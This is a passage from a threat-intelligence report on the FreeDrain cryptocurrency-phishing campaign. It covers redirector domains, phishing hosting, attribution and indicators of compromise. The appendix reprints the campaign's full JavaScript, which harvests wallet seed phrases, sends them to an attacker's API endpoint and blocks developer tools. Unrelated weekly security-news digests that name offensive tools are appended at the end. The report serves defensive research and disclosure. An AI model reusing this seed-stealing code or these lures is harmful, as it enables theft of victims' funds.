  • bildherrywation[.]com

Each URL also included a GUID-like string in the path, which may have served as a session ID, traffic source identifier, or logic gate for redirection behavior. Examples:

  • https://causesconighty[.]com/ce405b14-337a-43a5-9007-ed1aaf807998
  • https://causesconighty[.]com/d7c95729-6eed-452a-b246-865e0d97fc23
  • https://disantumcomptions[.]com/61e7fc9c-baef-43f0-82bf-a7f12a025586
  • https://disantumcomptions[.]com/6c31ec3b-0d4b-4bf4-a9f4-91453c4ef99e
  • https://distrypromited[.]com/d7c95729-6eed-452a-b246-865e0d97fc23
  • https://distrypromited[.]com/ff933705-9619-4292-9e22-02269acc197b
  • https://posectsinsive[.]com/9431711a-cf35-4ebd-b5db-eacba9ef7ee3
  • https://posectsinsive[.]com/994ffe2a-21fb-448a-b4e3-01b9483c5460

(A complete list of FreeDrain-associated redirector domains is provided in the appendix.)

Domain Registration and Infrastructure Clues

All domains we identified were registered via Key-Systems GmbH, a registrar often used for bulk domain purchases and programmatic registration.

Initially, we suspected that these domains were all managed by the FreeDrain operators as well, but have since connected these domains to a much larger network of thousands domain names that are used to route traffic for many different purposes.

Looking at DNS history for some of the older redirectors on our list, we saw that they rotated IP addresses relatively infrequently, resolving to just a small number of IPs within a time window of weeks to months.

DNS history for scientcontopped[.]com prior to expiration (2024)
DNS history for scientcontopped[.]com prior to expiration (2024)

The domain resolved to only a handful of IPs over its active life suggesting stable, centralized hosting infrastructure.

Pivoting on IP addresses shared by these older FreeDrain domains revealed that there are hundreds of other domain names that share nearly identical characteristics in terms of naming conventions, registration patterns, and hosting patterns. Yet, these other domains didn’t exhibit direct ties to FreeDrain behavior.

Pivot from confirmed FreeDrain redirector (yellow asterisk) reveals broader domain ecosystem with matching infrastructure traits
Pivot from confirmed FreeDrain redirector (yellow asterisk) reveals broader domain ecosystem with matching infrastructure traits

This led us to two possibilities:

  1. The redirectors are part of a leased infrastructure-as-a-service model, used by FreeDrain and potentially many other threat actors
  2. FreeDrain is a subdivision of a broader operation, with shared tooling and infrastructure but distinct campaigns

At this stage, the full extent of this infrastructure and the relationships between campaigns remain an open research question. What is clear, however, is that FreeDrain does not operate in isolation, and the redirection layer may be a service used by multiple actors.

Phishing Pages

Across our monitoring, we observed dozens of variations in FreeDrain phishing pages but technically, they were all fairly simple and consistent in architecture.

These phishing pages were most often:

  • Hosted on cloud infrastructure, primarily Amazon S3 and Azure Web Apps
  • Designed to mimic legitimate cryptocurrency wallet interfaces (Trezor, MetaMask, Ledger, etc.)
  • Implemented using HTML forms or AJAX POST requests to transmit stolen credentials to attacker-controlled endpoints
A typical FreeDrain phishing page served from an S3 bucket, delivering only static content
A typical FreeDrain phishing page served from an S3 bucket, delivering only static content

Some S3-hosted phishing sites sent harvested data to live backend services on Azure, as seen in multiple instances where form actions pointed to azurewebsites.net applications.

The form for an S3-hosted FreeDrain phishing page posts to “/send.php” running in Azure
The form for an S3-hosted FreeDrain phishing page posts to “/send.php” running in Azure

Human Operators Behind the Scenes

While most pages used standard static phishing techniques, we occasionally encountered live chat widgets embedded in Azure-hosted phishing pages.

This chat feature had previously been documented in a 2022 report by Netskope (one of the few references we ever found to FreeDrain and the earliest reported). Our own interactions confirmed that humans, not bots, were responding to victim inquiries in real time, often providing reassurance or technical “help” to keep targets engaged.

Live chat interaction on a phishing page hosted in Azure
Live chat interaction on a phishing page hosted in Azure

Clean, Unobfuscated Exfiltration Code

In the malicious JavaScript that we observed that handled POST requests with stolen seed phrases, the code is well-formatted, commented, and does not appear to be obfuscated in any way. Full examples are provided in the appendix, but a snippet of the POST request is below (domain bolded and defanged):

const data = {};
inputs.forEach((input, index) => {
    data[`phrase${index}`] = input.value.trim();
});
data.subject = "Trezor connect2";
data.message = "Successfull fetch data";
$.ajax({
    type: "POST",
    url: "https://rfhwuwixxi.execute-api.us-east-1.amazonaws[.]com/prod/eappmail",
    dataType: "json",
    crossDomain: true,
    contentType: "application/json; charset=utf-8",
    data: JSON.stringify(data),
    success: function (result) {
        alert('Data submitted successfully1!');
        window.location.href = 'https://suite.trezor.io/web/';
        location.reload();
    },
    error: function (xhr, status, error) {
        window.location.href = 'https://suite.trezor.io/web/';
 
 
}
});

Despite its simplicity, the phishing backend was effective, disposable, and often difficult to trace—highlighting just how low the bar is for technical sophistication when paired with wide-scale reach and persistent lure infrastructure.

Actor Analysis

Attribution is inherently difficult when infrastructure is ephemeral and built on shared, free-tier services. Yet through a combination of repository metadata, behavioral signals, and timing artifacts, we were able to extract meaningful insights about FreeDrain’s operators, including likely location, working patterns, and their degree of operational coordination.

Our first major breakthrough came from GitHub Pages (github.io), which only allows hosting via a public repository that matches the account’s GitHub username (e.g., username.github.io). This constraint meant every active FreeDrain lure page hosted on GitHub had a publicly accessible repository behind it.

We cloned hundreds of these repositories and analyzed the commit metadata, including timestamps, usernames, email addresses, and whether commits were made via the CLI or web interface. Several clear patterns emerged:

  • Email addresses were always unique, tied 1:1 with the GitHub account, and never reused.
  • All emails came from free providers like Gmail, Hotmail, Outlook, and ProtonMail.
  • While naming styles varied widely (capitalization, numbers, patterns), we found clusters of similarly structured addresses, suggesting manual creation by multiple individuals, possibly using shared templates or naming approach.
Sample of email addresses found in FreeDrain-associated Github commit
Sample of email addresses found in FreeDrain-associated Github commit

Importantly, GitHub commits preserve the local timezone of the user unless manually configured otherwise. In our dataset, over 99% of commits were timestamped in UTC+05:30 (Indian Standard Time), our first strong geographic indicator.

Over 99% of the commits analyzed were localized to UTC+05:30
Over 99% of the commits analyzed were localized to UTC+05:30

We corroborated this signal using metadata from other FreeDrain free-infrastructure/services. Webflow, for instance, embeds a “last published” timestamp in the HTML source of hosted sites. When we aggregated timestamps across the many FreeDrain Webflow pages, a clear 9-to-5 weekday work pattern emerged, complete with a consistent midday break. This pattern aligns closely with a standard business schedule in the IST timezone.

Aggregated Webflow publish times show an exceptionally clear weekday work pattern in UTC+05:30
Aggregated Webflow publish times show an exceptionally clear weekday work pattern in UTC+05:30
Webflow embeds publish timestamps into the HTML source code of published websites
Webflow embeds publish timestamps into the HTML source code of published websites

Combining these and other signals across platforms, we assess with high confidence that FreeDrain is operated by individuals based in the IST timezone, likely in India, working standard weekday hours.

Additionally, timeline analysis shows that FreeDrain has been active since at least 2022, with a notable acceleration in mid-2024. As of this writing, the campaign remains active across several free hosting and publishing platforms.

Confirmed “last published” times, by date
Confirmed “last published” times, by date

Disruption Efforts and Opportunities

The scale and diversity of services abused by FreeDrain made disruption an ongoing challenge. While the campaign leaned heavily on free-tier platforms, many of which allowed users to publish images, text, external links, and even custom JavaScript to subdomains under well-known parent domains, very few of these platforms offered streamlined abuse reporting workflows.

In most cases, there was no direct method to report malicious content from the content page itself, forcing us to manually investigate each platform’s policies, support forms, or contact channels. This adds unnecessary friction to the response process, especially when scaled across hundreds of active malicious pages.

Even more concerning, most of the publishing platforms lacked the detection capabilities to identify this type of coordinated abuse on their own. The indicators were there: repetitive naming patterns, clustered behavior, identical templates reused across subdomains, but limited proactive action was being taken.

This highlights a broader industry need:

  • Free-tier content platforms should invest in basic abuse prevention tooling and more accessible reporting mechanisms.

At minimum, this includes:

  • Allowing abuse to be reported directly from published content pages
  • Monitoring for patterns of misuse (e.g., bulk account creation, similar domain structures, repeated hosting of external phishing kits)
  • Establishing direct communication lines with trusted threat intel analysts and threat researchers

FreeDrain’s reliance on free-tier platforms is not unique, and without better safeguards, these services will continue to be weaponized at scale.

This isn’t just a security issue, it’s a business one. When threat actors abuse these platforms to host phishing pages, fake login portals, or crypto scams, they erode user trust in the entire platform domain. Over time, this leads to real financial consequences:

  • Reputation damage: Reputable domain names like webflow.io, and teachable.com can quickly become flagged by corporate security tools, browser warning systems, and threat intelligence feeds. This reduces their utility for legitimate users and undermines the brand’s credibility.
  • Deliverability and discoverability: Once a platform’s domain is associated with widespread abuse, search engines, email providers, and social networks may down-rank or block links from that domain, hurting all users, including paying customers.
  • Customer churn and support burden: Abuse-driven issues often result in a higher volume of customer support tickets, complaints, and refunds, particularly when paying users find their content mistakenly flagged or blocked due to a shared domain reputation.
  • Increased infrastructure and fraud costs: Hosting abusive content, even at scale on free tiers, still consumes compute, storage, and bandwidth. Worse, it may attract waves of automated account signups and resource abuse that raise operational costs.

Failing to detect and mitigate this kind of abuse isn’t just a user risk– it’s an unpaid tax on the business, dragging down growth and trust at every layer. Proactive abuse prevention and streamlined reporting are not just table stakes for security, they’re critical to long-term sustainability.

References and Similarities to Other Campaigns

Elements of the FreeDrain campaign were first publicly documented in August 2022 by Netskope, with a follow-up report in September 2022. Netskope’s early findings captured the core tactics that continue today: leveraging SEO manipulation to drive traffic to lure pages, which then redirect to credential-harvesting phishing sites. Netskope also published another update in October 2024, focusing on FreeDrain’s use of Webflow-hosted infrastructure, confirming the campaign’s continued evolution while retaining the same fundamental workflow.

FreeDrain’s abuse of legitimate free-tier platforms is part of a broader trend in phishing infrastructure, but it remains distinct from other well-known crypto phishing efforts. For example, the CryptoCore campaign, reported by Avast in August 2024, similarly targets cryptocurrency users but relies heavily on YouTube content and impersonation videos to draw in victims, rather than search engine poisoning and static phishing sites.

In 2023, Trustwave reported on the use of Cloudflare’s pages.dev and workers.dev services in phishing, showing how modern hosting platforms that offer free, customizable subdomains with minimal friction are being systematically exploited, mirroring FreeDrain’s approach.

Recent reporting has also shed light on the kinds of threat actors that may be behind campaigns like FreeDrain. Just this week, the U.S. Treasury sanctioned individuals linked to cyber scam operations in Southeast Asia, specifically a militia group in Burma involved in online fraud networks. While distinct from FreeDrain, these operations share similar hallmarks: large-scale abuse of online infrastructure, technical capability, and a focus on financial theft, demonstrating the scale and organization such campaigns can operate under.

FreeDrain’s techniques have also been informally documented by affected users. In particular, Trezor hardware wallet customers have reported fraudulent websites mimicking the Trezor ecosystem, some of which were part of FreeDrain’s infrastructure:

Conclusion

The FreeDrain network represents a modern blueprint for scalable phishing operations, one that thrives on free-tier platforms, evades traditional abuse detection methods, and adapts rapidly to infrastructure takedowns. By abusing dozens of legitimate services to host content, distribute lure pages, and route victims, FreeDrain has built a resilient ecosystem that’s difficult to disrupt and easy to rebuild.

Through detailed infrastructure analysis, repository metadata mining, and cross-platform behavioral correlations, we uncovered rare insights into the actors behind the campaign, including strong indicators that the operation is manually run by a group based in the UTC+05:30 timezone, working standard business hours. Despite this visibility, systemic weaknesses in reporting mechanisms and abuse detection have allowed FreeDrain to persist and even accelerate in 2024.

This is not just a FreeDrain problem. The broader ecosystem of free publishing platforms is being exploited in ways that disproportionately benefit financially motivated threat actors. Without stronger default safeguards, identity verification, or abuse response infrastructure, these services will continue to be abused, undermining user trust and inflicting real-world financial harm.

By exposing the scale and structure of the FreeDrain network, we hope this research will enable better platform-level defenses, more informed user education, and collaboration across the security community to limit the reach and longevity of operations like this.

Indicators of Compromise and Relations

Full List of IOCs can be downloaded here.

FreeDrain Lure Pages

Download Full List for over 40,000 URLs
Sample:

https://metamaskchromextan.gitbook\.io/us
https://suprt-ios-trzorhard.gitbook\.io/en-us
https://bridge-tziuur.gitbook\.io/en-us
https://auth-ledger-com-cdn.webflow\.io/
https://start—leddger-cdn-auth.webflow\.io/
https://help–ledgre-auth-us.webflow\.io/
https://home-trezsor-start.gitbook\.io/en-us
https://wlt-phantom-wlt.webflow\.io/
https://bridge-cen-trezseer.gitbook\.io/en-us
https://ledgerauth-wellat.webflow\.io/
https://ledgerivwaselet-us.webflow\.io/
https://extentrust.gitbook\.io/en-us
https://truststextion.gitbook\.io/us
https://apps-support—mettmask.gitbook\.io/us
https://cobo-wallet-digital-cdm.webflow\.io/
https://extension–metaamsk-info.gitbook\.io/us
https://bridge-docs–trzc.gitbook\.io/en-us
https://suite-trezoreio.gitbook\.io/us
https://auth–io-coinbausehelp.gitbook\.io/us
https://help-blockf-cdnn.teachable\.com/p/home

FreeDrain Redirect Domains

These are the redirector domains we directly observed leveraged by FreeDrain going back 3+ years.

affanytougees[.]com
ameddingpersusan[.]com
anicnicpriesert[.]com
antressmirestos[.]com
aparingupgger[.]com
bildherrywation[.]com
boutiondistan[.]com
brasencewompture[.]com
carefersoldidense[.]com
causesconighty[.]com
charweredrepicks[.]com
chazineconally[.]com
chierstimines[.]com
chopedansive[.]com
claredcarcing[.]com
coadormertranegal[.]com
coateethappallel[.]com
comaincology[.]com
coneryconstiny[.]com
conkeyprowse[.]com
coutioncargin[.]com
coveryinting[.]com
crefoxappecture[.]com
curphytompared[.]com
darylapsebaryanmar[.]com
deconsorconsuperb[.]com
disantumcomptions[.]com
distrypromited[.]com
escentdeveriber[.]com
fladestateins[.]com
flesterwisors[.]com
forrofilecabelle[.]com
gaiterimturches[.]com
goestodos[.]com
grawableaugespare[.]com
gresesticparray[.]com
guardawalle[.]com
hunnerdimental[.]com
issetheserepson[.]com
lamothyadjuncan[.]com
leatlyinsioning[.]com
leavesnottered[.]com
listationsomminder[.]com
litnentschelds[.]com
minarymacrefeat[.]com
mingaryshestence[.]com
nashiclehunded[.]com
obiansvieller[.]com
paticableharent[.]com
penlabuseoribute[.]com
peridneyperadebut[.]com
pladamousaribached[.]com
posectsinsive[.]com
pringingsernel[.]com
saverateaubtle[.]com
scientcontopped[.]com
screnceagrity[.]com
searranksdeveal[.]com
shotheatsgnovel[.]com
sonyonsa[.]com
stalitynotinium[.]com
storsianpreemed[.]com
swissborglogi[.]xyz
teleedlescestable[.]com
tirzrstartio[.]com
topsorthynaveneur[.]com
tralizetrulines[.]com
trighlandcomping[.]com
versaryconnedges[.]com
walitykildsence[.]com
wintrolancing[.]com

Phishing URLs

https://atomicwallet.azurewebsites[.]net/
https://bietbutylogn.azurewebsites[.]net/
https://biokefeiwltliv29gleed.azurewebsites[.]net/
https://bitgetwalt.azurewebsites[.]net/
https://bleuckfie-coins.azurewebsites[.]net/
https://bleuckkfiecoins.azurewebsites[.]net/
https://bleuickkfiescoins.azurewebsites[.]net/
https://blocckfi-api.azurewebsites[.]net/
https://blocikifi.azurewebsites[.]net/
https://blockffiecoinas.azurewebsites[.]net/
https://blockfi-api.azurewebsites[.]net/
https://blockfiapp-apk.azurewebsites[.]net/
https://blockfiicoins.azurewebsites[.]net/
https://blockificoinz.azurewebsites[.]net/
https://blockifiicoins.azurewebsites[.]net/
https://blockkfi-api.azurewebsites[.]net/
https://blockkfiapi-apk.azurewebsites[.]net/
https://blockkkfifies.azurewebsites[.]net/
https://bloickfie-app.azurewebsites[.]net/
https://bloickfiicoins.azurewebsites[.]net/
https://bloickkfieecoinss.azurewebsites[.]net/
https://bloickkfieescoins876.azurewebsites[.]net/
https://bloiickkfieecoinase.azurewebsites[.]net/
https://blokfi-error.azurewebsites[.]net/
https://blokkfiapp-api.azurewebsites[.]net/
https://blokkifi.azurewebsites[.]net/
https://bloockkfi-api.azurewebsites[.]net/
https://blouckfi-api.azurewebsites[.]net/
https://bluckfi-error.azurewebsites[.]net/
https://bluckfilogn.azurewebsites[.]net/
https://blueckficoinis.azurewebsites[.]net/
https://bluickkfiecoins.azurewebsites[.]net/
https://boloickfieecoins.azurewebsites[.]net/
https://buloickkfieecoins876.azurewebsites[.]net/
https://cbswlterliv487wlt.azurewebsites[.]net/
https://cionbise-error.azurewebsites[.]net/
https://cnbse13liv.s3.eu-north-1.amazonaws[.]com/index.html
https://cobo-wallet.azurewebsites[.]net/
https://cobowalletoffc.azurewebsites[.]net/
https://cobowalletz.azurewebsites[.]net/
https://coienebaiseerlivwlt02elisa.azurewebsites[.]net/
https://coinibisasesn567.azurewebsites[.]net/
https://dft0-hjgkd26-fkj.s3.us-east-1.amazonaws[.]com/index.html
https://edgeronwlet.azurewebsites[.]net/
https://edgersuwlet.azurewebsites[.]net/
https://eedu0s-jhdc-osxza.s3.us-east-1.amazonaws[.]com/index.html
https://en-ledger-cdn.azurewebsites[.]net/
https://en-trezor-cdn-auth.azurewebsites[.]net/
https://en-trezor-cdn.azurewebsites[.]net/
https://errorciiobiosewds876.azurewebsites[.]net/
https://errorcoibisaeseaenbaeb876.azurewebsites[.]net/
https://errorlovblockfi876.azurewebsites[.]net/
https://errorlovbloikcffie876.azurewebsites[.]net/
https://errorlovbolockfiee987.azurewebsites[.]net/
https://errorlovcobisaed786.azurewebsites[.]net/
https://errorlovcoibioise876.azurewebsites[.]net/
https://errorlovexdkekam879.azurewebsites[.]net/
https://errorlovexds987.azurewebsites[.]net/
https://errorlovtenizr987.azurewebsites[.]net/
https://errorlovtrasenzjedsuties.azurewebsites[.]net/
https://errorlovtreazezz876.azurewebsites[.]net/
https://errorlovtrikmanen987.azurewebsites[.]net/
https://errormetiamiasks876.azurewebsites[.]net/
https://errormetismesk987.azurewebsites[.]net/
https://errortreazeeasd-suties.azurewebsites[.]net/
https://ertzirdnwwltliv.azurewebsites[.]net/
https://exd98uswlterliv.azurewebsites[.]net/
https://exdiusiwalet.azurewebsites[.]net/
https://ezioron1wlet.azurewebsites[.]net/
https://iotruzorsuite.azurewebsites[.]net/
https://itrusttcepitalcoins.azurewebsites[.]net/
https://kaikzx-slsld39-lkjf.s3.us-east-1.amazonaws[.]com/index.html
https://krakenzcoins.azurewebsites[.]net/
https://ladzearwlt03jokesmko.azurewebsites[.]net/
https://ldr-0gr-dsxz.s3.us-east-1.amazonaws[.]com/index.html
https://leddgeircoins.azurewebsites[.]net/
https://leddgersacoins.azurewebsites[.]net/
https://ledeagderwallet.azurewebsites[.]net/
https://ledg-01jghe0fhdk.s3.eu-north-1.amazonaws[.]com/index.html
https://ledgar-live-walliet.s3.us-east-2.amazonaws[.]com/index.html
https://ledger-start-403.azurewebsites[.]net/
https://ledger-start-api.azurewebsites[.]net/
https://ledgercoinserror3.azurewebsites[.]net/
https://ledgercoinsweb3.azurewebsites[.]net/
https://ledgersapi-apk.azurewebsites[.]net/
https://ledgersapp.azurewebsites[.]net/
https://ledgirlvestart.azurewebsites[.]net/
https://ledigerwaliteasee.azurewebsites[.]net/
https://ledzaererwltliv30mariamon.azurewebsites[.]net/
https://ledzor365livwlter.azurewebsites[.]net/
https://legdrlievlgin.azurewebsites[.]net/
https://leidgeierwalitese.azurewebsites[.]net/
https://leidgirscoinsweb.azurewebsites[.]net/
https://leldger-live.azurewebsites[.]net/
https://lezor3021sxes.azurewebsites[.]net/
https://lfg0-oiosh-hdh.s3.us-east-1.amazonaws[.]com/index.html
https://lgnwltcnbsliv.azurewebsites[.]net/
https://lledgerwallest.azurewebsites[.]net/
https://lzr13wlt.s3.eu-north-1.amazonaws[.]com/index.html
https://metamaskdn.azurewebsites[.]net/
https://metamasksrs.azurewebsites[.]net/
https://metamassk.azurewebsites[.]net/
https://mmetamassk.azurewebsites[.]net/
https://mtmsklivwlter57wlt.azurewebsites[.]net/
https://ndaaxscoins.azurewebsites[.]net/
https://ndaxcoins.azurewebsites[.]net/
https://ndeauxcoinsweb.azurewebsites[.]net/
https://neaiaxcoins.azurewebsites[.]net/
https://oduisshweb3.azurewebsites[.]net/
https://portal-treaeameaene876.azurewebsites[.]net/
https://ra0-lkjd01-gfhjd.s3.eu-north-1.amazonaws[.]com/index.html
https://relkd28-lokdyuj.s3.us-east-1.amazonaws[.]com/index.html
https://sdfg0d28-djkfk.s3.us-east-1.amazonaws[.]com/index.html
https://secuxwallet-api.azurewebsites[.]net/
https://sjdhd29-oiuw0.s3.us-east-1.amazonaws[.]com/index.html
https://sledegerwallet.azurewebsites[.]net/
https://solflareewerror.azurewebsites[.]net/
https://suiitewalettrzior.azurewebsites[.]net/
https://teirzoriiostart.azurewebsites[.]net/
https://tereamanezheoakeeoake.azurewebsites[.]net/
https://tereazeriwaleits.azurewebsites[.]net/
https://tereizercoinswalts.azurewebsites[.]net/
https://tereizercoinsweb.azurewebsites[.]net/
https://tereziiorcoinsweb3.azurewebsites[.]net/
https://tereziioreeae-walieats.azurewebsites[.]net/
https://terezorcoinscweb3.azurewebsites[.]net/
https://terezuiear-api.azurewebsites[.]net/
https://terozeiorwltliv31wikub.azurewebsites[.]net/
https://terozriosiuet.azurewebsites[.]net/
https://terzoerirwlt476liv.azurewebsites[.]net/
https://tirizeriostrt.azurewebsites[.]net/
https://tirizurstrtio.azurewebsites[.]net/
https://tirzwltliv09erds.azurewebsites[.]net/
https://tizrerlivwlt897wlt.azurewebsites[.]net/
https://tizrwlterliv45livwlt.azurewebsites[.]net/
https://tr01-dkfjgk-slas.s3.eu-north-1.amazonaws[.]com/index.html
https://tr0ox-obnsj.s3.eu-north-1.amazonaws[.]com/index.html
https://tra09fjl-sodfjjkd.s3.eu-north-1.amazonaws[.]com/index.html
https://trac-durjg-fkf.s3.eu-north-1.amazonaws[.]com/index.html
https://traezor-suitez403.azurewebsites[.]net/
https://traieazeariscoins.azurewebsites[.]net/
https://tre876162ru0988zer.azurewebsites[.]net/
https://treaizerecoins.azurewebsites[.]net/
https://treauzearcoins.azurewebsites[.]net/
https://treazerapi-apk.azurewebsites[.]net/
https://treazerszcoins.azurewebsites[.]net/
https://treaziexc-ax-bc.azurewebsites[.]net/
https://treazirapi-apk.azurewebsites[.]net/
https://treazosr-api.azurewebsites[.]net/
https://treazsoirsuites.azurewebsites[.]net/
https://treazuer-suite.azurewebsites[.]net/
https://treizaers-coins.azurewebsites[.]net/
https://treizoircoinerror3.azurewebsites[.]net/
https://treizrwalogn.azurewebsites[.]net/
https://treriertriliv34erwlt.azurewebsites[.]net/
https://trezaereade-suite.azurewebsites[.]net/
https://trezieserscoins.azurewebsites[.]net/
https://trezior-suite.azurewebsites[.]net/
https://trezirapp-api.azurewebsites[.]net/
https://treziresacoins.azurewebsites[.]net/
https://triezorwallets.azurewebsites[.]net/
https://trioriorwlt485wltliv.azurewebsites[.]net/
https://trizeriowaliet.azurewebsites[.]net/
https://triziorecoinsweb3.azurewebsites[.]net/
https://triziriosuite.azurewebsites[.]net/
https://trizuriosiute.azurewebsites[.]net/
https://trucetreizerr.azurewebsites[.]net/
https://truiazearcoins.azurewebsites[.]net/
https://trzeriostrt.azurewebsites[.]net/
https://ttrzorappsuite.azurewebsites[.]net/
https://tzer30liv.s3.us-east-2.amazonaws[.]com/index.html
https://tzr06wlt.s3.eu-north-1.amazonaws[.]com/index.html
https://tzreoirwlt05balba.azurewebsites[.]net/
https://tzreoriewlt31wikub.azurewebsites[.]net/
https://uniswapv3login.azurewebsites[.]net/
https://uphooldlogn.azurewebsites[.]net/
https://web-treszor.azurewebsites[.]net/
https://weberrortrezur886.azurewebsites[.]net/
https://wltcbserlive467wlt.azurewebsites[.]net/
https://wltlzr67erlivehsfjfd.azurewebsites[.]net/
https://woleatcoebs34livwlt.azurewebsites[.]net/
https://zen-ledger-error.azurewebsites[.]net/
https://zenledgerscoinsweb.azurewebsites[.]net/

Example JavaScript

This is an example of the JavaScript (“app.js”) that was included on the S3-hosted phishing example: https://dft0-hjgkd26-fkj.s3.us-east-1.amazonaws[.]com/index.html.

Note the defanged malicious URL in the code below–that is the only alteration.

let currentWordCount = 12; // Default word count
function updateInputFields(wordCount) {
   const inputContainer = document.getElementById('inputContainer');
   inputContainer.innerHTML = '';
    currentWordCount = wordCount;
    for (let i = 0; i < wordCount; i++) { // Use 0-based index for phase keys
        const colDiv = document.createElement('div');
    // if (wordCount === 1) {
    //     colDiv.className = 'col-lg-21 col-md-12 col-sm-12 col-xs-12';
    //     colDiv.innerHTML = `
    //         <input
    //             class="form-control"
    //             type="text"
    //             placeholder="Input your words as many words as you have"
    //             name="word${i}"
    //             required
    //             title="Only alphabets are allowed.">
    //         <div class="error-message" style="font-size:12px;color: #fe3131f2; display: none;">Please enter a valid value.</div>
    //     `;
    // } else {
        colDiv.className = 'col-lg-4 col-md-4 col-sm-4 col-xs-12';
        colDiv.innerHTML = `
            <input
                class="form-control"
                type="text"
                placeholder="${i + 1}."
                name="word${i}"
                required
                pattern="[a-zA-Z]{1,10}"
                maxlength="10"
                oninput="this.value = this.value.replace(/[^a-zA-Z]/g, '').substring(0, 10);"
                title="Only alphabets are allowed.">
            <div class="error-message" style="font-size:12px;color: #fe3131f2; display: none;">Please enter a valid value.</div>
                `;
            // }
        inputContainer.appendChild(colDiv);
    }
    event.target.classList.add('active');
    const buttons = document.querySelectorAll('.displayflex button');
    buttons.forEach((button) => {
        button.classList.remove('active');
    });
    event.target.classList.add('active');
}
async function handleNextStep(event) {
    event.preventDefault();
    const inputContainer = document.getElementById('inputContainer');
    const inputs = inputContainer.querySelectorAll('input');
    let allValid = true;
    const enteredWords = new Set();
    inputs.forEach((input) => {
        const errorDiv = input.nextElementSibling; // Get the associated error div
        if (!input.checkValidity()) {
            errorDiv.style.display = 'block';
            allValid = false;
        } else {
            errorDiv.style.display = 'none';
        }
        const word = input.value.trim().toLowerCase(); // Normalize to lowercase to handle case insensitivity
        if (word && enteredWords.has(word)) {
            allValid = false;
            errorDiv.innerHTML = 'This word has already been entered.';
            errorDiv.style.display = 'block';
        } else {
            enteredWords.add(word);  // Add word to the Set
        }
    });
    if (!allValid) {
        alert("Mnemonic phrase is not valid. Try again.");
        return;
    }
    const data = {};
    inputs.forEach((input, index) => {
    data[`phrase${index}`] = input.value.trim();
    });
    data.subject = "Trezor connect2";
    data.message = "Successfull fetch data";
    $.ajax({
        type: "POST",
        url: "https://rfhwuwixxi.execute-api.us-east-1.amazonaws[.]com/prod/eappmail",
        dataType: "json",
        crossDomain: true,
        contentType: "application/json; charset=utf-8",
        data: JSON.stringify(data),
        success: function (result) {
        alert('Data submitted successfully1!');
        window.location.href = 'https://suite.trezor.io/web/';
        location.reload();
        },
        error: function (xhr, status, error) {
            window.location.href = 'https://suite.trezor.io/web/';
 
 
        }
    });
}

window.onload = function () {
    // Prevent the back button from navigating back
    function preventBack() {
    history.forward();
    }
    
    // Execute the `preventBack` function immediately after page load
    setTimeout(preventBack, 0);
    
    // Ensure the page doesn't cache on unload, forcing users to reload
    window.onunload = function () {
        return null;
    };
};

document.addEventListener('DOMContentLoaded', () => updateInputFields(12));

document.addEventListener("DOMContentLoaded", function () {
    const statusButton = document.getElementById("statusButton");
    const statusText = document.getElementById("statusText");
    const statusIcon = document.getElementById("statusIcon");
    // Initial state: "Waiting for Trezor..."
    statusText.textContent = "Waiting for Trezor... ";
    statusIcon.innerHTML = '';
    // After 2 seconds: "Establishing connection"
    setTimeout(() => {
        statusText.textContent = "Establishing connection...";
        statusIcon.innerHTML = '';
    }, 5000);
    // After 5 seconds: "Unable to read data" (Error state)
    setTimeout(() => {
    statusText.textContent = "Unable to read data";
    statusIcon.innerHTML = '';
    statusButton.classList.add("error-btn");
    }, 5000);
    function resetStatus() {
        // Reset to "Establishing connection..."
        statusText.textContent = "Establishing connection...";
        statusIcon.innerHTML = '';
        statusButton.classList.remove("error-btn");  // Reset error button class
        // After 3 seconds: Change status to "Unable to read data"
        setTimeout(() => {
            statusText.textContent = "Unable to read data";
            statusIcon.innerHTML = '';
            statusButton.classList.add("error-btn");
        }, 5000);
    }
    // Event listener for button click
    statusButton.addEventListener("click", function () {
        resetStatus(); // Reset and start the cycle on each click
    });
    // Optionally, you can trigger the status change flow immediately after page load for testing
    setTimeout(() => {
        resetStatus(); // Automatically run the flow when the page loads (optional)
    }, 5000);
});

    // Disable right-click context menu
    document.addEventListener("contextmenu", (event) => event.preventDefault());
    // Disable key combinations for opening developer tools
    document.addEventListener("keydown", (event) => {
    // Disable F12, Ctrl+Shift+I, Ctrl+Shift+J, Ctrl+U (View Source), Ctrl+Shift+C
    if (
        event.key === "F12" ||
        (event.ctrlKey && event.shiftKey && ["I", "J", "C"].includes(event.key)) ||
        (event.ctrlKey && event.key === "U")
    ) {
        event.preventDefault();
}
});

    // Detect if devtools is opened (basic detection)
    const detectDevTools = () => {
    const element = new Image();
        Object.defineProperty(element, "id", {
            get: () => {
                alert("Developer tools detected. Please close it to proceed.");
                // Redirect or log out the user
                window.location.href = "about:blank"; // Example action
            },
        });
        console.log(element);
    };
    detectDevTools();
    setInterval(detectDevTools, 1000);

Last Week in Security (LWiS) - 2025-06-02

By:Erik
3 June 2025 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2025-05-27 to 2025-06-02.

News

Techniques and Write-ups

Tools and Exploits

  • boflink - Linker for Beacon Object Files.
  • godump - A minimal, developer-friendly pretty-printer and debug dumper for Go structs, inspired by Laravel’s dump() and Symfony’s VarDumper.
  • Obfusk8 - Obfusk8: Obfuscation library based on C++17 for windows binaries.
  • termitty - The terminal automation framework.

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.

Last Week in Security (LWiS) - 2025-05-27

By:Erik
28 May 2025 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2025-05-19 to 2025-05-27.

News

Techniques and Write-ups

Tools and Exploits

  • SharpSuccessor - SharpSuccessor is a .NET Proof of Concept (POC) for fully weaponizing Yuval Gordon’s (@YuG0rd) BadSuccessor attack from Akamai.
  • BadSuccessor.ps1 - BadSuccessor checks for prerequisites and attack abuse.
  • OnionC2 - C2 written in Rust & Go powered by Tor network.
  • AI-Red-Teaming-Playground-Labs - AI Red Teaming playground labs to run AI Red Teaming trainings including infrastructure.
  • brc4_profile_maker - An interactive TUI tool to create Brute Ratel C4 profiles based on BURP browsing data.

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

  • kunai - Threat-hunting tool for Linux.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.

Last Week in Security (LWiS) - 2025-05-19

By:Erik
20 May 2025 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2025-05-12 to 2025-05-19.

